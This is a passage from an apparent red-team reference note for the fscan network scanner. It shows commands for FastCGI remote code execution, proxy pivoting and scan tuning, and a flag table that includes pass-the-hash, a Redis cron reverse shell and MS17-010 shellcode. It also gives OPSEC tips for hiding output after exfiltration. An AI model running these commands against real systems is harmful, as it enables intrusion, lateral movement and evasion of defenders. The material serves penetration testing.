is a known attack pattern 668 > 2. WMI execution creates process (Event ID 4688, Sysmon Event ID 1) and WMI activity (Event ID 5857–5861) 669 > 3. No command output returned by WMI module; blind execution only 670 > 4. Pass-the-hash detected by modern EDR and Windows Defender Credential Guard (if enabled) 671 672 > **Note —** + Technical Notes 673 > 1. Pass-the-hash (`-m smb2`) added in v1.8.2 674 > 2. WMI no-echo execution (`-m wmiexec`) added in v1.8.2 675 > 3. LM hash optional; modern Windows uses NTLM-only 676 > 4. WMI execution less reliable than SSH; prefer authenticated SMB enumeration or [Impacket](https://github.com/fortra/impacket) wmiexec.py 677 678 > **Note —** + Common Errors 679 > 1. **Access denied**: wrong hash, user lacks administrator rights, or Credential Guard enabled 680 > 2. **timeout**: SMB/WMI service unavailable or firewall 681 > 3. WMI command failed silently: verify command syntax, check target logs 682 683 --- 684 685 ## FastCGI Exploitation 686 687 > **Note —** + Purpose 688 > Detect and exploit [FastCGI](https://en.wikipedia.org/wiki/FastCGI) (PHP-FPM) misconfiguration to execute arbitrary code 689 690 ```bash 691 # Auto FastCGI scan during full scan 692 ./fscan -h 192.168.1.0/24 693 694 # Target specific FastCGI port 695 ./fscan -h 192.168.1.50 -p 9000 696 697 # Specify remote file path (optional) 698 ./fscan -h 192.168.1.50 -path /var/www/html/index.php 699 ``` 700 701 > **Note —** + FastCGI Options 702 > 1. **-path \<string\>**: Remote file path for FastCGI exploit (default tries common paths) 703 > 2. No dedicated `-m fcgi` module; auto-detected when port 9000 (or custom) is scanned 704 705 ```bash 706 # Scan /24 for exposed FastCGI 707 ./fscan -h 10.0.1.0/24 -p 9000 708 709 # Exploit with custom path 710 ./fscan -h 192.168.1.75 -p 9000 -path /usr/share/nginx/html/info.php 711 ``` 712 713 > **Note —** + Output Interpretation 714 > 1. **[+] FastCGI 192.168.1.50:9000 RCE**: Vulnerable to remote code execution 715 > 2. Command output or error message may be displayed inline 716 717 > **Note —** + OPSEC and Detection Notes 718 > 1. FastCGI exploitation logged in PHP-FPM logs, web server logs, and system logs 719 > 2. RCE attempts highly visible; spawned processes logged 720 > 3. Exposed FastCGI (port 9000 public) is severe misconfiguration; uncommon but high-value 721 722 > **Note —** + Technical Notes 723 > 4. FastCGI module added in v1.6.2 724 > 5. Primarily targets PHP-FPM; other FastCGI implementations less tested 725 726 > **Note —** + Common Errors 727 > 6. **Connection refused**: FastCGI not exposed or firewall 728 > 7. **File not found**: specified `-path` does not exist on target 729 > 8. Exploit failed: FastCGI version or configuration not vulnerable 730 731 --- 732 733 ## Output and Reporting 734 735 > **Note —** + Purpose 736 > Save scan results to file (text, JSON); control output verbosity and format 737 738 ```bash 739 # Default output to result.txt 740 ./fscan -h 192.168.1.0/24 741 742 # Custom output file 743 ./fscan -h 192.168.1.0/24 -o /tmp/scan_results.txt 744 745 # JSON output 746 ./fscan -h 192.168.1.0/24 -o results.json -json 747 748 # No file output (stdout only) 749 ./fscan -h 192.168.1.0/24 -no 750 751 # Silent scan (minimal stdout) 752 ./fscan -h 192.168.1.0/24 -silent 753 754 # No color output 755 ./fscan -h 192.168.1.0/24 -nocolor 756 ``` 757 758 > **Note —** + Output Options 759 > 1. **-o \<file\>**: Output file path (default `result.txt`) 760 > 2. **-no**: Do not save output to file 761 > 3. **-json**: Output in JSON format (v1.8.3+) 762 > 4. **-silent**: Suppress most stdout (for Cobalt Strike/automation; results still saved unless `-no`) 763 > 5. **-nocolor**: Disable ANSI color codes (v1.8.3+) 764 > 6. **-debug \<int\>**: Print progress/error summary every N seconds (default 60) 765 766 ```bash 767 # Save to custom file 768 ./fscan -h 10.0.0.0/16 -o /opt/scans/network_scan_2024-02-16.txt 769 770 # JSON output for automated parsing 771 ./fscan -h 192.168.1.0/24 -o scan.json -json 772 773 # Cobalt Strike beacon (silent, save to file) 774 ./fscan -h 172.16.0.0/24 -silent -o /tmp/.scan 775 776 # No file, stdout only 777 ./fscan -h 192.168.1.50 -no 778 779 # Disable color for log files 780 ./fscan -h 10.0.1.0/24 -nocolor -o scan.log 781 ``` 782 783 > **Note —** + Output Format Interpretation 784 > 1. **Text format**: human-readable, one result per line with prefixes (`[+]` success, `[-]` failure, `[*]` info) 785 > 2. **JSON format**: structured records (target, service, result, timestamp) 786 > 3. **-silent**: only errors and critical findings printed to stdout 787 788 > **Note —** + OPSEC Notes 789 > 4. Output files contain sensitive data (credentials, vulnerabilities); encrypt or secure-delete after exfiltration 790 > 5. Default `result.txt` in current directory; can be forensic artefact 791 > 6. `-silent` useful for beacon/agent execution to avoid console noise 792 793 > **Note —** + Technical Notes 794 > 7. JSON output (`-json`) and color control (`-nocolor`) added in v1.8.3 795 > 8. `-silent` intended for [Cobalt Strike](https://www.cobaltstrike.com/)/[Metasploit](https://www.metasploit.com/) integration 796 797 > **Note —** + Common Errors 798 > 9. **Permission denied**: cannot write to `-o` path; check directory permissions 799 > 10. Corrupt JSON: fscan crashed mid-scan; use `-debug` to diagnose 800 801 --- 802 803 ## Proxy and Network Options 804 805 > **Note —** + Purpose 806 > Route HTTP/SOCKS5 traffic through proxies; control network behaviour for pivoting or evasion 807 808 ```bash 809 # HTTP proxy for web PoC requests 810 ./fscan -h 192.168.1.0/24 -proxy http://127.0.0.1:8080 811 812 # SOCKS5 proxy for TCP connections (limited support) 813 ./fscan -h 192.168.1.0/24 -socks5 127.0.0.1:1080 814 815 # Scan via URL with proxy 816 ./fscan -u http://internal.target.local -proxy http://pivot.host:8080 817 ``` 818 819 > **Note —** + Proxy Options 820 > 1. **-proxy \<url\>**: HTTP proxy for web requests (PoC scanning, web fingerprinting) 821 > 2. **-socks5 \<IP:port\>**: SOCKS5 proxy for TCP connections (limited; some modules unsupported) 822 > 3. Note: `-socks5` disables timeouts (hardcoded behaviour) 823 824 ```bash 825 # Burp Suite interception 826 ./fscan -u https://192.168.1.100:8443 -proxy http://127.0.0.1:8080 827 828 # Pivot via SOCKS5 (e.g., SSH tunnel) 829 ssh -D 1080 user@pivot.host 830 ./fscan -h 10.10.10.0/24 -socks5 127.0.0.1:1080 831 832 # Chain: SOCKS5 pivot + HTTP proxy for PoCs 833 ./fscan -h 172.16.0.0/16 -socks5 127.0.0.1:1080 -proxy http://127.0.0.1:8080 834 ``` 835 836 > **Note —** + OPSEC and Detection Notes 837 > 1. Proxy traffic logged by proxy server (access logs, SIEM) 838 > 2. SOCKS5 proxy SSH tunnel creates persistent SSH session (logged) 839 > 3. HTTP proxy (Burp) exposes all traffic to interception/logging 840 > 4. `-socks5` timeout disabled; scans may hang on unreachable targets 841 842 > **Note —** + Technical Notes 843 > 1. SOCKS5 support added in v1.8.0; limited to simple TCP functions 844 > 2. HTTP proxy works for all web modules (fingerprinting, PoC scanning) 845 > 3. SOCKS5 does not support all Go libraries used in fscan; expect partial functionality 846 847 > **Note —** + Common Errors 848 > 4. **proxy connection refused**: proxy unreachable or not running 849 > 5. **SOCKS5 handshake failed**: incorrect proxy address or authentication required (fscan does not support SOCKS5 auth) 850 > 6. Timeout issues with SOCKS5: fscan disables timeout when SOCKS5 is set; manual Ctrl+C required 851 > 7. Some modules ignore SOCKS5: brute-force and certain PoCs may not route through SOCKS5 852 853 --- 854 855 ## Advanced Tuning Options 856 857 > **Note —** + Purpose 858 > Fine-tune scan behaviour, thread counts, timeouts, and special modes for large/complex engagements 859 860 ```bash 861 # High-speed scan (1000 threads) 862 ./fscan -h 10.0.0.0/16 -t 1000 -np -nobr -nopoc 863 864 # Slow, stealthy scan (50 threads, 10s timeout) 865 ./fscan -h 192.168.1.0/24 -t 50 -time 10 -br 1 866 867 # Debug mode (verbose errors every 30s) 868 ./fscan -h 192.168.1.0/24 -debug 30 869 ``` 870 871 > **Note —** + Advanced Options 872 > 1. **-t \<int\>**: Thread count (default 600); higher = faster but noisier 873 > 2. **-time \<int\>**: TCP/ICMP timeout in seconds (default 3) 874 > 3. **-wt \<int\>**: Web request timeout in seconds (default 5) 875 > 4. **-br \<int\>**: Brute-force threads per service (default 1) 876 > 5. **-num \<int\>**: PoC concurrency/rate (default 20) 877 > 6. **-debug \<int\>**: Print progress every N seconds (default 60) 878 > 7. **-top \<int\>**: Show top N live segments when scanning /8 (default 10) 879 > 8. **-full**: Exhaustive PoC scanning (Shiro 100 keys, backup file fuzzing) 880 > 9. **-dns**: Enable DNS log-based PoCs (requires external DNS log service) 881 882 ```bash 883 # Fast reconnaissance (skip brute and PoC) 884 ./fscan -h 172.16.0.0/16 -t 1200 -np -nobr -nopoc -time 1 885 886 # Thorough scan (full PoCs, slow) 887 ./fscan -h 192.168.1.0/24 -full -t 200 -time 5 -wt 10 -br 2 888 889 # Debug large scan 890 ./fscan -h 10.0.0.0/8 -m icmp -debug 10 891 892 # Custom thread tuning for unstable network 893 ./fscan -h 192.168.1.0/24 -t 100 -time 10 -wt 15 894 ``` 895 896 > **Note —** + Tuning Guidelines 897 > 1. **High thread counts** reduce scan time but increase errors (timeouts, connection refused) 898 > 2. **Low thread counts** reduce noise but increase scan duration (longer dwell time) 899 > 3. **-full mode** extremely noisy (100+ Shiro requests, backup file fuzzing) 900 > 4. **-dns PoCs** require external service; DNS queries logged by authoritative DNS servers 901 > 5. Default threads (600) optimised for /24; adjust for larger/smaller ranges 902 903 > **Note —** + OPSEC Notes 904 > 6. High thread counts create traffic bursts (NetFlow anomalies, connection spikes) 905 > 7. `-full` mode generates extreme noise and may trigger rate-limiting/WAF blocks 906 > 8. `-debug` provides progress feedback: periodic messages (completed X of Y) 907 908 > **Note —** + Common Errors 909 > 9. **too many open files**: reduce `-t` or raise OS limits (`ulimit -n 10000` on Linux) 910 > 10. Timeouts on slow links: increase `-time` and `-wt` 911 > 11. Memory exhaustion on large scans: reduce `-t`, split CIDR ranges 912 913 --- 914 915 ## Complete Flag Reference 916 917 > **Note —** + All Command-Line Flags 918 919 | Flag | Description | Example | 920 |:---|:---|:---| 921 | **-h \<targets\>** | IP/CIDR/range/comma-separated | `-h 192.168.1.0/24` | 922 | **-hf \<file\>** | Target file (one IP/CIDR per line) | `-hf targets.txt` | 923 | **-hn \<exclude\>** | Exclude IPs/CIDR | `-hn 192.168.1.1/28` | 924 | **-p \<ports\>** | Ports (single/list/range/group) | `-p 22,80,443` or `-p web` | 925 | **-pa \<ports\>** | Add ports to defaults | `-pa 3389,5900` | 926 | **-pn \<ports\>** | Exclude ports | `-pn 445` | 927 | **-portf \<file\>** | Port file | `-portf ports.txt` | 928 | **-m \<module\>** | Scan module | `-m ssh` (all, icmp, netbios, smb, smb2, ssh, rdp, ftp, mssql, mysql, postgresql, redis, oracle, mongodb, memcached, ms17010, wmiexec, fcgi) | 929 | **-t \<int\>** | Thread count (default 600) | `-t 1000` | 930 | **-time \<int\>** | Timeout seconds (default 3) | `-time 10` | 931 | **-wt \<int\>** | Web timeout seconds (default 5) | `-wt 15` | 932 | **-br \<int\>** | Brute-force threads (default 1) | `-br 3` | 933 | **-num \<int\>** | PoC rate (default 20) | `-num 50` | 934 | **-user \<string\>** | Username | `-user admin` | 935 | **-userf \<file\>** | Username file | `-userf users.txt` | 936 | **-usera \<string\>** | Add username to defaults | `-usera testuser` | 937 | **-pwd \<string\>** | Password | `-pwd password123` | 938 | **-pwdf \<file\>** | Password file | `-pwdf passwords.txt` | 939 | **-pwda \<string\>** | Add password to defaults | `-pwda testpass` | 940 | **-hash \<string\>** | NTLM hash (LM:NTLM or NTLM-only) | `-hash <LM>:<NTLM>` | 941 | **-domain \<string\>** | SMB/WMI domain | `-domain CORP` | 942 | **-sshkey \<file\>** | SSH private key | `-sshkey id_rsa` | 943 | **-c \<string\>** | Command (SSH/WMI) | `-c "whoami; id"` | 944 | **-rf \<file\>** | Redis SSH public key file | `-rf id_rsa.pub` | 945 | **-rs \<IP:port\>** | Redis cron reverse shell target | `-rs 10.0.1.5:4444` | 946 | **-sc \<type\>** | MS17-010 shellcode | `-sc add` | 947 | **-path \<string\>** | FastCGI/SMB remote file path | `-path /var/www/html/index.php` | 948 | **-u \<url\>** | Single URL (comma-separated in v1.8.1+) | `-u http://target.local` | 949 | **-uf \<file\>** | URL file | `-uf urls.txt` | 950 | **-proxy \<url\>** | HTTP proxy | `-proxy http://127.0.0.1:8080` | 951 | **-socks5 \<IP:port\>** | SOCKS5 proxy | `-socks5 127.0.0.1:1080` | 952 | **-cookie \<string\>** | PoC cookie | `-cookie "session=abc123"` | 953 | **-pocpath \<dir\>** | Custom PoC directory (xray YAML) | `-pocpath ./pocs/` | 954 | **-pocname \<string\>** | Filter PoCs by name | `-pocname weblogic` | 955 | **-o \<file\>** | Output file (default result.txt) | `-o scan.txt` | 956 | **-json** | JSON output (v1.8.3+) | `-json` | 957 | **-no** | No file output | `-no` | 958 | **-silent** | Silent mode (minimal stdout) | `-silent` | 959 | **-nocolor** | Disable color (v1.8.3+) | `-nocolor` | 960 | **-np** | Skip ping/ICMP | `-np` | 961 | **-ping** | Use OS ping instead of raw ICMP | `-ping` | 962 | **-nobr** | Skip brute-force | `-nobr` | 963 | **-nopoc** | Skip web PoC scanning | `-nopoc` | 964 | **-noredis** | Skip Redis security tests | `-noredis` | 965 | **-full** | Full PoC scan (Shiro 100 keys, backup fuzzing) | `-full` | 966 | **-dns** | Enable DNS log PoCs | `-dns` | 967 | **-wmi** | Enable WMI | `-wmi` | 968 | **-debug \<int\>** | Progress interval seconds (default 60) | `-debug 30` | 969 | **-top \<int\>** | Top N live segments (/8 scans, default 10) | `-top 20` | 970 971 --- 972 973 ## References 974 975 1. [fscan GitHub Repository](https://github.com/shadow1ng/fscan) 976 2. [fscan Releases](https://github.com/shadow1ng/fscan/releases) 977 3. [fscan v1.8.0 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.0) 978 4. [fscan v1.8.2 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.2) 979 5. [fscan v1.8.3 Release Notes](https://github.com/shadow1ng/fscan/releases/tag/1.8.3) 980 6. [fscan Command Injection Vulnerability - Issue #392](https://github.com/shadow1ng/fscan/issues/392) 981 7. [HackTricks - Redis Security](https://book.hacktricks.xyz/network-services-pentesting/6379-pentesting-redis) 982 8. [Microsoft Active Directory Domain Services Overview](https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overview) 983 9. [Microsoft SMB Protocol Overview](https://learn.microsoft.com/en-us/windows/win32/fileio/microsoft-smb-protocol-and-cifs-protocol-overview) 984 10. [Microsoft NTLM Overview](https://learn.microsoft.com/en-us/windows-server/security/kerberos/ntlm-overview) 985 11. [Microsoft WMI Documentation](https://learn.microsoft.com/en-us/windows/win32/wmisdk/wmi-start-page) 986 12. [EternalBlue (MS17-010) - Wikipedia](https://en.wikipedia.org/wiki/EternalBlue) 987 13. [xray Security Scanner](https://github.com/chaitin/xray) 988 14. [Impacket Toolkit](https://github.com/fortra/impacket) 989 990 --- 991 992 #fscan #reconnaissance #host-discovery #port-scanning #brute-force #pass-the-hash #web-fingerprinting #vulnerability-scanning #MS17-010 #Redis-exploitation #lateral-movement #SMB #SSH #WMI #internal-network #red-team #penetration-testing